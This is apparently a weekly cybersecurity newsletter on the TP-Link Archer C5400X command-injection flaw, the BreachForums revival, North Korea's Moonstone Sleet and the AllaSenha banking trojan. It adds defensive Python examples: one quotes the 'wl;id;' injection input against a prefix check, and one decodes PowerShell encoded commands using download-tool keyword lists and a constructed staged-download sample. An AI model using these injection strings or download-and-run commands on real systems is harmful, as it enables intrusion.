May 31 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that’s blowing up like a vindaloo 🔥🔥🔥
It’s Friday, folks, which can only mean one thing… It’s time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it.
Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹
⚠️ Urgent Update: Critical Security Flaw in TP-Link Archer C5400X Router 🚨
A maximum-severity vulnerability (CVE-2024-5035, CVSS 10.0) in the TP-Link Archer C5400X gaming router has been disclosed, allowing unauthenticated remote code execution via specially crafted requests. The flaw affects all firmware versions up to 1_1.1.6 and has been patched in version 1_1.1.7, released on May 24, 2024. 🛠️
Exploit Details
• The flaw is in the "rftest" binary, which exposes a network listener on TCP ports 8888, 8889, and 8890.
• The listener’s command restriction is only a prefix check on the received line, and the accepted line is then handed to a shell. A request such as "wl;id;" therefore passes the check, and the ';' ends the permitted wl command and starts an arbitrary one, giving command execution with elevated privileges.
Patch Information 🩹
The new firmware version 1_1.1.7 Build 20240510 mitigates the issue by discarding commands containing special characters.
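What the prefix check misses, and what a fix looks like, as an added example in Python (not TP-Link's firmware code and not ONEKEY's proof of concept): a hypothetical model of a listener that accepts a line, checks only that it starts with an allowed command name, and hands the whole line to a shell, beside a character-filter fix in the spirit of 1_1.1.7 and a stronger no-shell version. The allowed command set, the character allowlist and all function names are assumptions for the example; the "wl;id;" input is the one from the advisory.

```python
from __future__ import annotations

import re
import shlex
import subprocess
from typing import Callable, Optional

# Assumption for the example: the listener only meant to allow the "wl"
# wireless-config command. Hypothetical allowlist, not the vendor's.
ALLOWED_COMMANDS = {"wl"}

# Assumption: characters a filter-style fix would permit. Everything else
# (; | & $ ` " ' < > newline ...) is rejected before dispatch.
SAFE_LINE = re.compile(r"[A-Za-z0-9 _./:=-]+")


def vulnerable_accepts(line: str) -> bool:
    """Pre-patch pattern: a prefix test on the raw line.

    "wl;id;" starts with "wl", so it passes, and the unchanged string
    would then go to something like subprocess.run(line, shell=True),
    where the ';' ends the wl command and starts "id".
    """
    return line.startswith("wl")


def hardened_accepts(line: str) -> bool:
    """Filter in the spirit of the shipped fix: drop any line containing a
    character outside the allowlist, then require the exact command name
    as the first word (a prefix test alone would still accept "wlfoo")."""
    if not SAFE_LINE.fullmatch(line):
        return False
    return line.split(" ", 1)[0] in ALLOWED_COMMANDS


def build_argv(line: str) -> Optional[list[str]]:
    """Stronger fix: never involve a shell at all.

    Tokenise the line, require an exact match on argv[0] and return an
    argv for subprocess.run(argv) with shell=False. A ';' inside an
    argument then reaches the program as a literal byte, not as a
    command separator. Returns None if the line is rejected.
    """
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        return None
    return argv


def dispatch(line: str,
             runner: Optional[Callable[[list[str]], object]] = None) -> Optional[list[str]]:
    """Take one line from the socket, validate it and run it without a
    shell. `runner` is injectable so the example can be exercised without
    a real wl binary; by default it execs argv directly (no shell)."""
    argv = build_argv(line)
    if argv is None:
        return None
    (runner or (lambda a: subprocess.run(a, check=False)))(argv)
    return argv


if __name__ == "__main__":
    for probe in ("wl status", "wl;id;", "wl $(id)", "wl 'status", "nvram get"):
        print(f"{probe!r:14} prefix-check={vulnerable_accepts(probe)!s:5} "
              f"filtered={hardened_accepts(probe)!s:5} argv={build_argv(probe)}")
```

Rejecting metacharacters, as the shipped fix does, closes the reported bypass but is a deny-list by nature: it has to anticipate every way a shell can be talked into running something else, which is why build_argv avoids the shell entirely. Even then the arguments still reach wl, so any dangerous option of wl's own would need its own allowlist.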
Security Advice 🛡️
Update your TP-Link Archer C5400X router to the latest firmware immediately to protect against potential exploitation.
This fix is critical to prevent remote unauthenticated attackers from gaining control over your device.
Background
The flaw was discovered by German cybersecurity firm ONEKEY, emphasising the importance of securing wireless device configuration APIs.
The disclosure follows recent vulnerabilities in other networking devices, highlighting ongoing security challenges.
Now, on to today’s hottest cybersecurity news stories:
BreachForums is back with a brand new agenda
Introducing Moonstone Sleet, N. Korea's latest
Brazilian banks hit with AllaKore variant = AllaSenha
Just two weeks after a major U.S. law enforcement takedown, the notorious BreachForums is back in action at breachforums[.]st! The revival was announced by ShinyHunters, who is now selling what is claimed to be a 1.3 TB database of 560 million Ticketmaster customers for $500,000.
What's Inside?
The database allegedly contains:
• Full names, addresses, email addresses, phone numbers
• Ticket sales and event info
• Last four digits of credit cards and expiration dates
Sign-Up Required! ⚠️
Visitors now need to sign up for an account to view content.
Law Enforcement Strikes
Earlier, U.S. authorities dismantled BreachForums and seized its domains (.st/.cx/.is/.vc) and Baphomet’s Telegram channel. The FBI is reviewing backend data.
Who's Behind It?
It's unclear if the current ShinyHunters is the original hacker. The domain was reportedly reclaimed from NiceNIC. Is it a honeypot? Cybersecurity experts are sceptical.
A Brief History
BreachForums rose in March 2022 post-RaidForums' shutdown and re-emerged in mid-June 2023 after another takedown. The DoJ and FBI have yet to comment on the latest developments.
Stay tuned for more updates on this unfolding cyber drama!
A new North Korean cyber threat actor, Moonstone Sleet, is targeting software, IT, education, and defence sectors with sophisticated ransomware and malware. This group is closely linked to the infamous Lazarus Group.
Deceptive Tactics
Moonstone Sleet sets up fake companies and job offers, using trojanized tools, malicious games, and custom ransomware. They employ both tried-and-true and unique methods to achieve their goals.
Fake Jobs and Malicious Tools 🛠️
• Fake job offers and companies lure targets in
• Trojanized tools like modified PuTTY drop malicious payloads
• Malicious npm packages delivered through LinkedIn and freelancing sites
Dangerous Malware
Their attacks involve:
• Custom ransomware FakePenny
• Malicious game DeTankWar with embedded malware loaders
• Credential theft from the Windows LSASS process 🛡️
Unique Strategies
Moonstone Sleet creates fake companies (e.g., C.C. Waterfall, StarGlow Ventures) to approach targets, often posing as blockchain or software development firms. Emails often include tracking pixels to gauge interest.
Recent Attacks
Recent campaigns include targeting defence companies with ransomware demanding $6.6 million in Bitcoin. Microsoft urges vigilance against supply chain attacks.
Evolving Threat
Moonstone Sleet’s tactics have evolved from those of other North Korean threat actors, demonstrating the group's growing sophistication and ambition. Stay alert and secure!
Stay ahead of the curve with Presspool.ai! Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." That’s us, alright! How about you? Visionary AI executive, much?
And if the newsletter gets your motor running, you can take a butchers at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business.
Rest assured, the process is very straightforward.
You simply:
• Sign Up & Create Campaign
• Define your audience, budget, and message to captivate your audience.
• Launch your campaign, as Presspool’s AI matches it with ideal newsletter audiences for optimal reach and conversions.
• Finally, leverage real-time analytics to track performance and refine future strategies. Elevate your marketing game and stay informed with Presspool.ai! Simples!
Presspool.ai may just have what you need to succeed. And if the product isn’t for you, the newsletter alone is a gamechanger. And we know newsletters.
Brazilian banks are facing a new cyber threat: AllaSenha, a custom variant of the AllaKore RAT. The malware targets banking credentials and uses Microsoft Azure cloud infrastructure for command-and-control.
Who’s at Risk?
Targets include customers of major banks such as Banco do Brasil, Bradesco, Itaú Unibanco, and more. The attack likely starts with phishing messages containing malicious links.
How It Works 🛠️
• LNK File Trick: the link delivers a shortcut file (NotaFiscal.pdf.lnk) disguised as a PDF; Windows hides known extensions by default, so the victim sees only "NotaFiscal.pdf".
• BAT Payload: the shortcut runs a batch script that launches PowerShell with a Base64-encoded command.
• Python and DLL: the PowerShell stage downloads a Python runtime, runs a script (BPyCode), and loads the final DLL directly in memory.
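The delivery chain above lends itself to a few simple triage checks. The following is an added example in Python, not HarfangLab's or anyone's published tooling: it flags the double-extension lure, decodes a PowerShell -EncodedCommand payload (PowerShell expects that value to be UTF-16LE text, Base64-encoded) and looks in the decoded script for download and Python activity. The shortcut name comes from the report; the command line and script below are constructed for the example, and the extension lists and detection keywords are assumptions to tune.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# Extensions a lure pretends to be, and the extensions that actually run.
# Assumed lists for the example; extend to taste.
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png")
EXECUTABLE_EXTS = (".lnk", ".bat", ".cmd", ".exe", ".scr", ".vbs", ".js", ".hta")

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Assumed hints that a decoded script stages a second payload.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest",
                  "iwr ", "curl ", "wget ", "bitsadmin", "start-bitstransfer")


def is_double_extension_lure(filename: str) -> bool:
    """True for names like NotaFiscal.pdf.lnk: a document extension sitting
    in front of one that actually executes (Explorer hides the last
    extension by default, so the user sees "NotaFiscal.pdf")."""
    name = filename.lower()
    for exe in EXECUTABLE_EXTS:
        if name.endswith(exe):
            stem = name[: -len(exe)]
            return any(stem.endswith(doc) for doc in DOCUMENT_EXTS)
    return False


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script passed via -EncodedCommand, or None if the flag
    is absent or the value is not valid Base64-wrapped UTF-16LE."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_for_powershell(script: str) -> str:
    """Inverse of the above; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


@dataclass
class Finding:
    reasons: list[str] = field(default_factory=list)
    decoded: Optional[str] = None


def triage(filename: str, cmdline: str) -> Finding:
    """Combine the lure check and the command-line check for one event,
    e.g. a process-creation log entry plus the parent shortcut's name."""
    f = Finding()
    if is_double_extension_lure(filename):
        f.reasons.append(f"double-extension lure: {filename}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        f.decoded = decoded
        f.reasons.append("powershell -EncodedCommand present")
        low = decoded.lower()
        if any(h in low for h in DOWNLOAD_HINTS):
            f.reasons.append("decoded script downloads content")
        if "python" in low:
            f.reasons.append("decoded script references python")
    return f


# Constructed sample (not captured from the real campaign): the shortcut
# name is from the report, the command line mimics the described stages.
SAMPLE_LNK = "NotaFiscal.pdf.lnk"
SAMPLE_SCRIPT = ("(New-Object Net.WebClient).DownloadFile("
                 "'https://example.invalid/python.zip', 'python.zip'); "
                 "python BPyCode.py")
SAMPLE_CMDLINE = ("powershell.exe -NoProfile -w hidden -enc "
                  + encode_for_powershell(SAMPLE_SCRIPT))


if __name__ == "__main__":
    result = triage(SAMPLE_LNK, SAMPLE_CMDLINE)
    for reason in result.reasons:
        print("flag:", reason)
    print("decoded:", result.decoded)
```

The decoded script is the useful artefact: keyword hits only rank events, and a detection pipeline would feed the decoded text into further rules or a sandbox rather than stopping at the flags shown here.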
Malicious Operations
AllaSenha steals credentials and captures 2FA codes using overlay windows. It can even trick users into scanning QR codes for fraudulent transactions.
Key Findings
• Cloud C2: Uses Microsoft Azure Functions for flexible infrastructure.
• Portuguese-Speaking Developer: Likely linked to a user named bert1m.
• High Productivity: Latin American threat actors are prolific in cybercrime campaigns.
Wider Impact
These attacks, while focusing on Latin America, often affect global companies. Malspam campaigns with banking trojans like Casbaneiro are also targeting financial data.
Mobile Threats
Not just Windows: the Android banking trojan Anatsa infiltrated the Google Play Store, disguised as productivity apps, stealing banking credentials through overlays.
Stay Vigilant!
Protect your accounts and stay aware of phishing tactics. Cybersecurity measures are crucial to defending against these sophisticated attacks. 🛡️
See you next week, cyber squad
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders.
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future
Let us know what you think.
So long and thanks for reading all the phish!